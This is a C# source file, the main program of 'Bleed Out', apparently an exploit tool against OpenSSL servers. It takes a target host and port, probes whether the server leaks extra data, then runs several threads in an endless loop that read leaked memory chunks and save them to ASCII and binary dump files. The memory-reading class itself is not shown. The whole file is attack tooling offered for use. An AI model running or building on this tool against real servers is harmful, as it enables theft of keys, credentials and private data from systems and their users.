﻿using System;
using System.Collections.Generic;
using System.Linq;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Text.RegularExpressions;
using System.Threading;
using System.Threading.Tasks;

namespace BleedOut
{
    class Program
    {
        private static void DisplayMessage(ConsoleColor tokenColor, char token, string format, params object[] arg)
        {
            Cli.WriteLine(
                string.Format("[~{0}~{1}~R~] {2}", tokenColor, token, format),
                arg);
        }

        private static void WriteHeader(string format, params object[] arg)
        {
            Cli.WriteHeader(string.Format(format, arg), "~White~~|Blue~");
        }

        private static void DisplayDirections()
        {
            Cli.WriteLine(@"
~White~Command Line Arguments~R~

    -h {{host}}
    Specifies the host to exploit. Required.

    -p {{port}}
    Specifies the port to connect to. Default: 443.

    -t {{threads}}
    Specifies the number of threads to use. Default: 1.

    -a {{file}}
    Specifies the file to dump ASCII strings to. Default: {{host}}_{{port}}.txt.

    -b
    Specifies the file to dump binary data to. Default:  {{host}}_{{port}}.bin.
");
        }

        private static OpenSslMemoryReader GetReader()
        {
            return new OpenSslMemoryReader()
            {
                Host = CliArgs.Instance.Host,
                Port = CliArgs.Instance.Port
            };
        }

        private static void Dump(ChunkHandler[] handlers)
        {
            var reader = GetReader();

            while (true)
            {
                
                var chunk = reader.ReadChunk();

                if (chunk == null)
                {
                    Thread.Sleep(500);
                    continue;
                }

                foreach (var h in handlers)
                {
                    h.ProcessChunk(chunk);
                }
            }
        }

        private static string GetFilename(string type)
        {
            return string.Format(
                "{0}_{1}_dump.{2}", 
                CliArgs.Instance.Host,
                CliArgs.Instance.Port, 
                type);
        }

        private static string FormatEscape(string s)
        {
            return s
                .Replace("~", "~~")
                .Replace("{", "{{")
                .Replace("}", "}}");
        }

        private static bool TestServer()
        {
            DisplayMessage(
                ConsoleColor.White,
                '?',
                "Checking exlpoitability of ~Cyan~{0}:{1}~R~",
                CliArgs.Instance.Host,
                CliArgs.Instance.Port);

            var reader = GetReader();
            
            for (int i = 0; i < 10; i++)
            {
                if (reader.ReadChunk().Any())
                {
                    DisplayMessage(ConsoleColor.Green, '+', "Server appears to be exploitable");
                    
                    return true;
                }
                else
                {
                    DisplayMessage(ConsoleColor.Red, '-', "Server returned no extra data");
                    Thread.Sleep(500);
                }
            }

            return false;
        }

        private static void InitFiles()
        {
            if (string.IsNullOrEmpty(CliArgs.Instance.AsciiFile))
            {
                CliArgs.Instance.AsciiFile = GetFilename("txt");
                DisplayMessage(
                    ConsoleColor.White, 
                    'i', 
                    "Saving ASCII data to ~Cyan~{0}~R~",
                    CliArgs.Instance.AsciiFile);
            }

            if (string.IsNullOrEmpty(CliArgs.Instance.BinaryFile))
            {
                CliArgs.Instance.BinaryFile = GetFilename("bin");
                DisplayMessage(
                    ConsoleColor.White, 
                    'i', 
                    "Saving binary data to ~Cyan~{0}~R~",
                    CliArgs.Instance.BinaryFile);
            }
        }

        private static void Main(string[] args)
        {
            Cli.WriteHeader(
                string.Format(
                    "Bleed Out v{0} by John Leitch",
                    Assembly.GetExecutingAssembly().GetName().Version),
                "~White~~|Blue~");

            if (!args.Any())
            {
                DisplayDirections();
                Environment.Exit(1);
            }

            var args2 = new CliArgReader(args).Read<CliArgs>();

            if (!TestServer())
            {
                DisplayMessage(
                    ConsoleColor.Red, 
                    'x', 
                    "Server does not appear to be exploitable, exiting");
                Environment.Exit(2);
            }

            InitFiles();

            var handlers = new ChunkHandler[]
            {
                new AsciiChunkHandler(x => 
                    DisplayMessage(ConsoleColor.Yellow, 's', FormatEscape(x))),

                new BinaryChunkHandler(x =>
                    DisplayMessage(
                        ConsoleColor.Magenta,
                        'b',
                        "~Cyan~{0:n0}~R~ bytes dumped", 
                        x.Length,
                        CliArgs.Instance.BinaryFile)),
            };

            Parallel.ForEach(Enumerable.Range(0, args2.Threads), x =>
            {
                DisplayMessage(ConsoleColor.White, 'i', "Starting thread...");
                Dump(handlers);
            });

            new ManualResetEvent(false).WaitOne();
        }
    }
}
